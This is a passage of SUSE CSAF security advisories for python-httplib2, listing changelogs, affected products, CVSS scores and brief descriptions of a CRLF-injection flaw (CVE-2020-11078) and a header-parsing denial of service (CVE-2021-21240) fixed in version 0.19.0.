Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:28Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1807-1
Vulnerability from csaf_suse
Published
2021-05-31 14:23
Modified
2021-05-31 14:23
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non-security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- update to 0.17.3:
* bugfixes
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
httplib2 started to use certifi and this is already bent to
use system certificate bundle.
- handle the case when validation is disabled correctly.
The 'check_hostname' context attribute has to be
set first, othewise a 'ValueError: Cannot set
verify_mode to CERT_NONE when check_hostname
is enabled.' exception is raised.
- handle the case with ssl_version being None correctly
- Use ssl.create_default_context in the python2 case so that
the system wide certificates are loaded as trusted again.
- Source url must be https.
- Spec file cleanups
- Update to 0.10.3
* Fix certificate validation on Python<=2.7.8 without ssl.CertificateError
- Update to 0.10.2
* Just a reupload of 0.10.1, which was broken for Python3
because wheel distribution doesn't play well with our 2/3 split code base.
- Update to 0.10.1
* Remove VeriSign Class 3 CA from trusted certs
* Add IdenTrust DST Root CA X3
* Support for specifying the SSL protocol version (Python v2)
* On App Engine use urlfetch's default deadline if None is passed.
* Fix TypeError on AppEngine “__init__() got an unexpected keyword argument 'ssl_version’”
* Send SNI data for SSL connections on Python 2.7.9+
* Verify the server hostname if certificate validation is enabled
* Add proxy_headers argument to ProxyInfo constructor
* Make disable_ssl_certificate_validation work with Python 3.5.
* Fix socket error handling
- Remove httplib2-bnc-818100.patch, merged upstream.
- Project moved from code.google.com to GitHub, fix the url
accordingly
- attempt to build multi-python
- update and cleanup of httplib2-use-system-certs.patch,
so that the passthrough is clean for python2 and so that it does
the right thing in python3
Patchnames
SUSE-2021-1807,SUSE-OpenStack-Cloud-7-2021-1807,SUSE-SLE-Module-Public-Cloud-12-2021-1807
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon-security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle.\n\n- handle the case when validation is disabled correctly.\n The 'check_hostname' context attribute has to be\n set first, othewise a 'ValueError: Cannot set\n verify_mode to CERT_NONE when check_hostname\n is enabled.' exception is raised.\n\n- handle the case with ssl_version being None correctly\n\n- Use ssl.create_default_context in the python2 case so that\n the system wide certificates are loaded as trusted again.\n\n- Source url must be https.\n\n- Spec file cleanups\n\n- Update to 0.10.3\n * Fix certificate validation on Python<=2.7.8 without ssl.CertificateError\n- Update to 0.10.2\n * Just a reupload of 0.10.1, which was broken for Python3\n because wheel distribution doesn't play well with our 2/3 split code base.\n- Update to 0.10.1\n * Remove VeriSign Class 3 CA from trusted certs\n * Add IdenTrust DST Root CA X3\n * Support for specifying the SSL protocol version (Python v2)\n * On App Engine use urlfetch's default deadline if None is passed.\n * Fix TypeError on AppEngine “__init__() got an unexpected keyword argument 'ssl_version’”\n * Send SNI data for SSL connections on Python 2.7.9+\n * Verify the server hostname if certificate validation is enabled\n * Add proxy_headers argument to ProxyInfo constructor\n * Make disable_ssl_certificate_validation work with Python 3.5.\n * Fix socket error handling\n- Remove httplib2-bnc-818100.patch, merged upstream.\n\n- Project moved from code.google.com to GitHub, fix the url\n accordingly\n\n- attempt to build multi-python\n\n- update and cleanup of httplib2-use-system-certs.patch,\n so that the passthrough is clean for python2 and so that it does\n the right thing in python3\n ", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1807,SUSE-OpenStack-Cloud-7-2021-1807,SUSE-SLE-Module-Public-Cloud-12-2021-1807", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1807-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1807-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211807-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1807-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008894.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-31T14:23:46Z", generator: { date: "2021-05-31T14:23:46Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1807-1", initial_release_date: "2021-05-31T14:23:46Z", revision_history: [ { date: "2021-05-31T14:23:46Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-7.7.1.noarch", product: { name: "python-httplib2-0.19.0-7.7.1.noarch", product_id: "python-httplib2-0.19.0-7.7.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-7.7.1.noarch", product: { name: "python3-httplib2-0.19.0-7.7.1.noarch", product_id: "python3-httplib2-0.19.0-7.7.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE OpenStack Cloud 7", product: { name: "SUSE OpenStack Cloud 7", product_id: "SUSE OpenStack Cloud 7", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:7", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 12", product: { name: "SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:12", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.7.1.noarch as component of SUSE OpenStack Cloud 7", product_id: "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.7.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 7", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.7.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 12", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:46Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:46Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1808-1
Vulnerability from csaf_suse
Published
2021-05-31 14:23
Modified
2021-05-31 14:23
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- update to 0.17.3:
* bugfixes
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
- httplib2 started to use certifi and this is already bent to
use system certificate bundle
Patchnames
HPE-Helion-OpenStack-8-2021-1808,SUSE-2021-1808,SUSE-OpenStack-Cloud-8-2021-1808,SUSE-OpenStack-Cloud-Crowbar-8-2021-1808
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - httplib2 started to use certifi and this is already bent to\n use system certificate bundle\n ", title: "Description of the patch", }, { category: "details", text: "HPE-Helion-OpenStack-8-2021-1808,SUSE-2021-1808,SUSE-OpenStack-Cloud-8-2021-1808,SUSE-OpenStack-Cloud-Crowbar-8-2021-1808", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1808-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1808-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211808-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1808-1", url: "https://lists.suse.com/pipermail/sle-updates/2021-May/019148.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-31T14:23:58Z", generator: { date: "2021-05-31T14:23:58Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1808-1", initial_release_date: "2021-05-31T14:23:58Z", revision_history: [ { date: "2021-05-31T14:23:58Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-7.3.1.noarch", product: { name: "python-httplib2-0.19.0-7.3.1.noarch", product_id: "python-httplib2-0.19.0-7.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-7.3.1.noarch", product: { name: "python3-httplib2-0.19.0-7.3.1.noarch", product_id: "python3-httplib2-0.19.0-7.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "HPE Helion OpenStack 8", product: { name: "HPE Helion OpenStack 8", product_id: "HPE Helion OpenStack 8", product_identification_helper: { cpe: "cpe:/o:suse:hpe-helion-openstack:8", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud 8", product: { name: "SUSE OpenStack Cloud 8", product_id: "SUSE OpenStack Cloud 8", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:8", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud Crowbar 8", product: { name: "SUSE OpenStack Cloud Crowbar 8", product_id: "SUSE OpenStack Cloud Crowbar 8", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud-crowbar:8", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of HPE Helion OpenStack 8", product_id: "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", relates_to_product_reference: "HPE Helion OpenStack 8", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of SUSE OpenStack Cloud 8", product_id: "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 8", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of SUSE OpenStack Cloud Crowbar 8", product_id: "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud Crowbar 8", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to 